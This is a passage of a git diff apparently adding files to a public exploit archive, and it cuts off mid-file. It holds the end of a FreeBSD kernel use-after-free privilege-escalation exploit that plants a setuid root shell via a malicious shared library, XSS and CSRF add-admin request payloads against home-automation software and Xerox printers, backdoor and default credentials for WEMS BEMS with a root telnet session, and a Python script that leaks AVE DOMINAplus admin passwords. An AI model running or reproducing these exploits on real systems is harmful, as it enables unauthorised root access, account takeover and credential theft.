bytes_rec, server_socket; + int sv[2], fds[3], hammer_socket[NUM_FORKS]; + int *fd_ptr; + char socket_path[256], sync_buf[3], buf[256]; + pthread_t write_thread, trigger_thread, monitor_thread; + pthread_t hammer_threads[NUM_THREADS]; + pid_t pids[NUM_FORKS]; + socklen_t len; + struct thread_data thread_data; + struct sockaddr_un server, client; + struct sockaddr_un hammer_socket_addr[NUM_FORKS]; + + // Socket for receiving thread status + unlink(SERVER_PATH); + prepare_domain_socket(&server, SERVER_PATH); + server_socket = bind_domain_socket(&server); + + // Sockets to receive hammer signal + for (i = 0; i < NUM_FORKS; i++) { + snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i); + unlink(socket_path); + prepare_domain_socket(&hammer_socket_addr[i], socket_path); + hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]); + } + + strncpy(sync_buf, "1\n", 3); + len = sizeof(struct sockaddr_un); + + if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) { + perror("[!] socketpair"); + exit(1); + } + + pthread_mutex_init(&write_mtx, NULL); + pthread_mutex_init(&trigger_mtx, NULL); + pthread_cond_init(&write_cond, NULL); + pthread_cond_init(&trigger_cond, NULL); + + // Create the thread to monitor the number of + // dirty buffers directly in the beginning + // to be ready when needed + pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL); + + // Prepare the UaF using the 0day + prepare(fds); + fd = fds[0]; + fd2 = fds[1]; + fd3 = fds[2]; + + // Create the threads which will execute the exploit + thread_data.fd = fd; + thread_data.fd2 = fd2; + pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data); + pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data); + + for (j = 0; j < NUM_FORKS; j++) { + if ((pids[j] = fork()) < 0) { + perror("[!] fork"); + abort(); + } + else if (pids[j] == 0) { + // Close the file descriptors + // becasue each fork will have an own reference + // to the file object, thus increasing the + // reference counter + close(fd); + close(fd2); + close(fd3); + pthread_mutex_init(&hammer_mtx, NULL); + pthread_cond_init(&hammer_cond, NULL); + + // Create the hammer threads + for (i = 0; i < NUM_THREADS; i++) { + pthread_create(&hammer_threads[i], NULL, hammer, NULL); + } + + printf("[+] Fork %d created all threads\n", j); + + // Wait for the signal to start hammering from the parent + if ((bytes_rec = recvfrom(hammer_socket[j], + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] accept"); + abort(); + } + + // Broadcast to the hammer threads to + // start hammering + pthread_cond_broadcast(&hammer_cond); + + // Wait for the hammer threads + for (i = 0; i < NUM_THREADS; i++) { + pthread_join(hammer_threads[i], NULL); + } + + pthread_cond_destroy(&hammer_cond); + pthread_mutex_destroy(&hammer_mtx); + + exit(0); + } else { + printf("[+] Created child with PID %d\n", pids[j]); + } + } + + // Wait for the preparation of all hammer threads + // in the forks. + // + // If all are prepared, send a signal to the childs + // to start the hammering process to create dirty + // buffers. + read_thread_status(server_socket); + printf("[+] Send signal to Start Hammering\n"); + for (i = 0; i < NUM_FORKS; i++) { + if (sendto(hammer_socket[i], + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &hammer_socket_addr[i], + sizeof(hammer_socket_addr[0])) == -1) { + perror("[!] sendto"); + exit(1); + } + } + + // Wait for all threads to finish + pthread_join(monitor_thread, NULL); + for (i = 0; i < NUM_FORKS; i++) { + kill(pids[i], SIGKILL); + printf("[+] Killed %d\n", pids[i]); + } + + pthread_join(write_thread, (void **) &fd_ptr); + pthread_join(trigger_thread, NULL); + + pthread_mutex_destroy(&write_mtx); + pthread_mutex_destroy(&trigger_mtx); + pthread_cond_destroy(&write_cond); + pthread_cond_destroy(&trigger_cond); + + // Prevent a kernel panic + prevent_panic(*fd_ptr); + + // fd was acquired from write_to_file + // which allocs a pointer for it + free(fd_ptr); +} + +int main(int argc, char **argv) +{ + setbuf(stdout, NULL); + + fire(); + + return 0; +} + +EOF + +# Compile with -m32 to exploit FreeBSD-SA-19:24.mqueuefs +cc -o exploit -lpthread exploit.c +# cc -o exploit -m32 -lpthread exploit.c + +cat > program.c << EOF +#include +#include +#include +#include + +void _init() +{ + if (!geteuid()) + execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); +} + +EOF + +# Compile the shared library object +cc -o program.o -c program.c -fPIC +cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles +cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 + +# Start the exploit +# +# su will execute the shared library object +# that creates the shell binary copy +echo "[+] Firing the Exploit" +./exploit +su + +# Ensure that everything has worked +# and execute the root-shell +if [ -f /tmp/xxxx ]; then + echo "[+] Enjoy!" + echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf" + /tmp/xxxx +else + echo "[!] FAIL" +fi \ No newline at end of file diff --git a/exploits/hardware/webapps/47806.txt b/exploits/hardware/webapps/47806.txt new file mode 100644 index 000000000..9266e586c --- /dev/null +++ b/exploits/hardware/webapps/47806.txt @@ -0,0 +1,115 @@ +# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting +# Date: 2019-12-30 +# Author: LiquidWorm +# Vendor: Tom Rosenback and Daniel Malmgren +# Product web page: http://karpero.mine.nu/ha/ +# Affected version: 3.3.2 +# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips +# Advisory ID: ZSL-2019-5556 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php +# HomeAutomation v3.3.2 Stored and Reflected XSS + + +Vendor: Tom Rosenback and Daniel Malmgren +Product web page: http://karpero.mine.nu/ha/ +Affected version: 3.3.2 + +Summary: HomeAutomation is an open-source web interface and scheduling solution. +It was initially made for use with the Telldus TellStick, but is now based on a +plugin system and except for Tellstick it also comes with support for Crestron, +OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, +etc.) based on an advanced scheduling system, taking into account things like +measurements from various sensors. With the houseplan view you can get a simple +overview of the status of your devices at their location in your house. + +Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities +when input passed via several parameters to several scripts is not properly sanitized +before being returned to the user. This can be exploited to execute arbitrary HTML +and script code in a user's browser session in context of an affected site. + +Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips + Apache/2.4.29 (Ubuntu) + PHP/7.4.0RC4 + PHP/7.3.11 + PHP 7.2.24-0ubuntu0.18.04.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5556 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php + + +06.11.2019 + +-- + + +Reflected XSS: +-------------- + +https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ== + + +Stored XSS: +----------- + +POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1 +Host: localhost +Connection: keep-alive +Content-Length: 998 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 +Sec-Fetch-User: ?1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1 +Accept-Encoding: gzip, deflate, br +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og + + +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="id" + +-1 +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="action" + +save +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="name" + +XSS +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="comment" + +"> +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="icon_on"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="scenario" + +1 +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="devices[0]" + +1 +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="statuses[0]" + +1 +------WebKitFormBoundaryq4LcgA7mbqElCW4q +Content-Disposition: form-data; name="save" + +Save +------WebKitFormBoundaryq4LcgA7mbqElCW4q-- \ No newline at end of file diff --git a/exploits/hardware/webapps/47813.txt b/exploits/hardware/webapps/47813.txt new file mode 100644 index 000000000..08735b7ae --- /dev/null +++ b/exploits/hardware/webapps/47813.txt @@ -0,0 +1,73 @@ +# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) +# Date: 2018-12-19 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.xerox.com/ +# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655 +# Software : Xerox Printer +# Product Version: WorkCentre® 6655 +# Vulernability Type : Cross-Site Request Forgery (Add Admin) +# Vulenrability : Cross-Site Request Forgery +# CVE : N/A + +# Description : +# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware. +# A request to add users is made in the Device User Database form field. This request is captured by +# the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request +# to add users is made in the Device User Database form field to the xerox.set URI. +# (The frmUserName value must have a unique name.) + + +HTTP POST Request : + +POST /dummypost/xerox.set HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 494 +Origin: https://server +Connection: close +Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp +Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue +Upgrade-Insecure-Requests: 1 + +CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 + +HTTP Response : + +HTTP/1.1 200 OK +Date: Wed, 18 Dec 2019 22:09:40 GMT +Server: Apache +Connection: close +Content-Type: text/html +Content-Length: 13518 + +CSRF HTML PoC : + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/47815.txt b/exploits/hardware/webapps/47815.txt new file mode 100644 index 000000000..68feffb45 --- /dev/null +++ b/exploits/hardware/webapps/47815.txt @@ -0,0 +1,72 @@ +# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin) +# Date: 2018-12-19 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.xerox.com/ +# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/ +# Software : Xerox Printer +# Product Version: WorkCentre® 7855 +# Vulernability Type : Cross-Site Request Forgery (Add Admin) +# Vulenrability : Cross-Site Request Forgery +# CVE : N/A + +# Description : +# The CSRF vulnerability was discovered in the WorkCentre® 7855 printer model of Xerox printer hardware. +# A request to add users is made in the Device User Database form field. This request is captured by +# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7855 printers allow CSRF. A request +# to add users is made in the Device User Database form field to the xerox.set URI. +# (The frmUserName value must have a unique name.) + +HTTP POST Request : + +POST /dummypost/xerox.set HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 494 +Origin: http://server +Connection: close +Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp +Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue +Upgrade-Insecure-Requests: 1 + +CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 + +HTTP Response : + +HTTP/1.1 200 OK +Date: Thu, 19 Dec 2019 05:13:19 GMT +Server: Apache +Connection: close +Content-Type: text/html +Content-Length: 11947 + +CSRF HTML PoC : + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/47816.txt b/exploits/hardware/webapps/47816.txt new file mode 100644 index 000000000..a9cf59cda --- /dev/null +++ b/exploits/hardware/webapps/47816.txt @@ -0,0 +1,72 @@ +# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin) +# Date: 2018-12-19 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.xerox.com/ +# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series +# Software : Xerox Printer +# Product Version: WorkCentre® 7830 +# Vulernability Type : Cross-Site Request Forgery (Add Admin) +# Vulenrability : Cross-Site Request Forgery +# CVE : N/A + +# Description : +# The CSRF vulnerability was discovered in the WorkCentre® 7830 printer model of Xerox printer hardware. +# A request to add users is made in the Device User Database form field. This request is captured by +# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7830 printers allow CSRF. A request +# to add users is made in the Device User Database form field to the xerox.set URI. +# (The frmUserName value must have a unique name.) + +HTTP POST Request : + +POST /dummypost/xerox.set HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 494 +Origin: http://server +Connection: close +Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp +Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue +Upgrade-Insecure-Requests: 1 + +CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 + +HTTP Response : + +HTTP/1.1 200 OK +Date: Thu, 19 Dec 2019 05:34:36 GMT +Server: Apache +Connection: close +Content-Type: text/html +Content-Length: 15022 + +CSRF HTML PoC : + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/47817.txt b/exploits/hardware/webapps/47817.txt new file mode 100644 index 000000000..2eb11fc9d --- /dev/null +++ b/exploits/hardware/webapps/47817.txt @@ -0,0 +1,211 @@ +# Exploit: WEMS BEMS 21.3.1 - Undocumented Backdoor Account +# Date: 2019-12-30 +# Author: LiquidWorm +# Vendor: WEMS Limited +# Product web page: https://www.wems.co.uk +# Advisory ID: ZSL-2019-5552 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php + +WEMS BEMS 21.3.1 Undocumented Backdoor Account + + +Vendor: WEMS Limited +Product web page: https://www.wems.co.uk +Affected version: Web: 21.3.1 + Web: 20.0beta + Web: 19.5 + Web: 18.4 + Firmware: 1.26.6 (OS: 5.3) + Firmware: 1.23.7 (OS: 5.0) + Firmware: 1.21.4 (OS: 4.1a-usb) + Firmware: 1.18.0.3 (OS: i686-1.1) +Platform: Shockwave Flash (SWF) / CGI + +Summary: We (WEMS) offer the world's first fully wireless energy management system. +Our solution enables your organization to take control of its energy costs, by monitoring +lighting, heating and air conditioning equipment to identify wastage across multiple +sites and start saving money instantly. Additionally, we offer a service which enables +you to personally control the settings of your building - remotely, via text messaging +and the internet - from wherever you happen to be in the world. + +Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded. +These sets of credentials are never exposed to the end-user and cannot be changed through +any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability +by logging in using the backdoor account with highest privileges for administration and gain +full system control. The check_users.sh Bash script is used to generate the default accounts +on the system with their passwords and privilege level. The backdoor user cannot be seen in +the users settings in the admin panel and it also uses an undocumented privilege level 3 when +using the addhttpuser program which allows full availability of the features that the WEMS +is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP +access using the credentials gast:glasshou or root:glasshou. + +Tested on: Linux 2.6.16 armv5tejl + thttpd/2.25b + Adam 7000 System + WEMS OS 5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5552 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php + + +06.07.2019 + +-- + + +Excerpt content of check_users.sh bash script: +---------------------------------------------- + +# cat /tmp/check_users.sh +... +... +if [ -n "${varSystem}" ];then + #add 'V.A.R.' user credentials + /mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null + /mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null + /mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null +else + #add 'wems' user credentials + /mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null + /mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null + /mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null +fi + +echo "Adding logging user credentials..." +/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null + +# Verify user added successfully... +if [ "$?" -eq "255" ] +then + echo "Error when adding logging user credentials - aborting.." + cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers + exit +fi + +veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers` + +if [ -n "$veri_user" ] +then + echo "User credentials added successfully." + cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default + exit +else + echo "Error when adding user credentials - restoring defaults." + cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers +fi +---------------------------------------------- + + +Default and hard-coded credentials: +----------------------------------- + +WEMS: + + [Level 2/Admin - Web/SWF->CGI] : wems:kup5EF4s + [Level 1/User - Web/SWF->CGI] : wemsuser:user + [Level 0/View - Web/SWF->CGI] : wemsview:view + [Level 3/Backdoor - Web/SWF->CGI] : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam) + +V.A.R. (Value Added Reseller): + + [Level 2/Admin - Web/SWF->CGI] : var:88fRK66Q + [Level 1/User - Web/SWF->CGI] : varuser:user + [Level 0/View - Web/SWF->CGI] : varview:view + +Shell: + + [Level 500/User - Telnet/FTP] : gast:glasshou + [Level 0/root - Telnet/FTP] : root:glasshou +----------------------------------- + + +By calling the auth command through the cmd parameter, the cgiauth binary +reads the /mnt/etc/httpusers file and checks validation for authentication. +To login with the backdoor account the following HTTP GET request is made: +-------------------------------------------------------------------------- + +GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1 +Host: 192.168.1.17 +User-Agent: Noproblem/25.1 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://192.168.1.17/SMARThome1.swf + +Response observed: + +HTTP/1.1 200 OK +content-type: text/html +Transfer-Encoding: chunked +Date: Fri, 13 Sep 2019 18:15:17 GMT +Server: WEMS OS 5.0 Casino + +sessionid=EQhaZPEXgJQhkXeZ&level=3&username=YWRhbWNvbGxlY3Q + + +-------------------------------------------------------------------------- + + +Running addhttpuser, reading httpusers file: +-------------------------------------------- + +# /mnt/bin/addhttpuser +Usage is -u -p -l +# cat /mnt/etc/httpusers +0:wems:$1$3EVBJ96F$RBX7xggVT8.zXM9vDbGWB/:2 +1:wemsuser:$1$3EVBJA6F$Gr6zU7L0n4OPq7YdCM5.b1:1 +2:wemsview:$1$3EVBJB6F$6XtYBc2VaQYucRe2T7lfa.:0 +3:YWRhbWNvbGxlY3Q:$1$3EVBJD6F$scO5furQud3eKLHpNyUyo.:3 +# ls -al /mnt/bin/addhttpuser +-rwxr-xr-x 1 root root 16520 Jan 29 2014 /mnt/bin/addhttpuser +-------------------------------------------- + + +Root shell: +----------- + +$ telnet 192.168.1.17 +Connected to 192.168.1.17. +Escape character is '^]'. + +- Adam 7000 System - Version 4.1a-usb - + +WEMS login: gast +Password: + + +BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash) +Enter 'help' for a list of built-in commands. + +$ id +uid=500(gast) gid=500 +$ su +Password: + + +BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash) +Enter 'help' for a list of built-in commands. + +# id +uid=0(root) gid=0(root) +# netstat -nat +Active Internet connections (servers and established) +Proto Recv-Q Send-Q Local Address Foreign Address State +tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN +tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN +tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN +----------- + + +$ ftp 192.168.1.17 +WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready. +user root +331 Password required for root. +pass glasshou +230 User root logged in. \ No newline at end of file diff --git a/exploits/hardware/webapps/47819.txt b/exploits/hardware/webapps/47819.txt new file mode 100644 index 000000000..5f6804a7c --- /dev/null +++ b/exploits/hardware/webapps/47819.txt @@ -0,0 +1,115 @@ +# Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure +# Date: 2019-12-30 +# Author: LiquidWorm +# Vendor: AVE S.p.A. +# Product web page: https://www.ave.it | https://www.domoticaplus.it +# Affected version: Web Server Code 53AB-WBS - 1.10.62 +# Advisory ID: ZSL-2019-5550 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php + +#!/usr/bin/env python +# +# +# AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit +# +# +# Vendor: AVE S.p.A. +# Product web page: https://www.ave.it | https://www.domoticaplus.it +# Affected version: Web Server Code 53AB-WBS - 1.10.62 +# Touch Screen Code TS01 - 1.0.65 +# Touch Screen Code TS03x-V | TS04X-V - 1.10.45a +# Touch Screen Code TS05 - 1.10.36 +# Models: 53AB-WBS +# TS01 +# TS03V +# TS04X-V +# TS05N-V +# App version: 1.10.77 +# App version: 1.10.65 +# App version: 1.10.64 +# App version: 1.10.62 +# App version: 1.10.60 +# App version: 1.10.52 +# App version: 1.10.52A +# App version: 1.10.49 +# App version: 1.10.46 +# App version: 1.10.45 +# App version: 1.10.44 +# App version: 1.10.35 +# App version: 1.10.25 +# App version: 1.10.22 +# App version: 1.10.11 +# App version: 1.8.4 +# App version: TS1-1.0.65 +# App version: TS1-1.0.62 +# App version: TS1-1.0.44 +# App version: TS1-1.0.10 +# App version: TS1-1.0.9 +# +# Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System. +# Designed to revolutionize your concept of living. DOMINA plus is the AVE home +# automation proposal that makes houses safer, more welcoming and optimized. In +# fact, our home automation system introduces cutting-edge technologies, designed +# to improve people's lifestyle. DOMINA plus increases comfort, the level of safety +# and security and offers advanced supervision tools in order to learn how to evaluate +# and reduce consumption through various solutions dedicated to energy saving. +# +# Desc: The application suffers from clear-text credentials disclosure vulnerability +# that allows an unauthenticated attacker to issue a request to an unprotected directory +# that hosts an XML file '/xml/authClients.xml' and obtain administrative login information +# that allows for a successful authentication bypass attack. +# +# Default credentials: admin:password +# Configuration and camera credentials disclosure: /xml/tsconf.xml +# +# ================================================== +# root@kali:~/domina# ./poc.py http://192.168.1.10 +# +# Ze microfilm: +# ------------- +# Username: arnoldcontrol +# Password: P1sD0nt5pYMe +# ================================================== +# +# Tested on: GNU/Linux 4.1.19-armv7-x7 +# GNU/Linux 3.8.13-bone50/bone71.1/bone86 +# Apache/2.4.7 (Ubuntu) +# Apache/2.2.22 (Debian) +# PHP/5.5.9-1ubuntu4.23 +# PHP/5.4.41-0+deb7u1 +# PHP/5.4.36-0+deb7u3 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2019-5550 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php +# +# +# 06.10.2019 +# + +import sys,re +import xml.etree.ElementTree as XML + +from urllib2 import Request,urlopen + +if (len(sys.argv) <= 1): + print '[*] Usage: poc.py http://ip:port' + exit(0) + +host = sys.argv[1] +headers = {'Accept': 'application/xml'} +request = Request(host+'/xml/authClients.xml', headers=headers) +print '\nZe microfilm:' +print '-------------' +xml = urlopen(request).read() +tree = XML.fromstring(xml) + +for user in tree.findall('customer'): + print 'Username: ',user.get('plantCode') + +for pwd in tree.iter('password'): + print 'Password: '+pwd.text+'\n' \ No newline at end of file diff --git a/exploits/hardware/webapps/47820.txt b/exploits/hardware/webapps/47820.txt new file mode 100644 index 000000000..ad0cb1069 --- /dev/null +++ b/exploits/hardware/webapps/47820.txt @@ -0,0 +1,79 @@ +# Exploit: AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot +# Date: 2019-12-30 +# Author: LiquidWorm +# Vendor: AVE S.p.A. +# Product web page: https://www.ave.it | https://www.domoticaplus.it +# Affected version: Web Server Code 53AB-WBS - 1.10.62 +# Advisory ID: ZSL-2019-5548 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php + +AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot + + +Vendor: AVE S.p.A. +Product web page: https://www.ave.it | https://www.domoticaplus.it +Affected version: Web Server Code 53AB-WBS - 1.10.62 + Touch Screen Code TS01 - 1.0.65 + Touch Screen Code TS03x-V | TS04X-V - 1.10.45a + Touch Screen Code TS05 - 1.10.36 + Models: 53AB-WBS + TS01 + TS03V + TS04X-V + TS05N-V + App version: 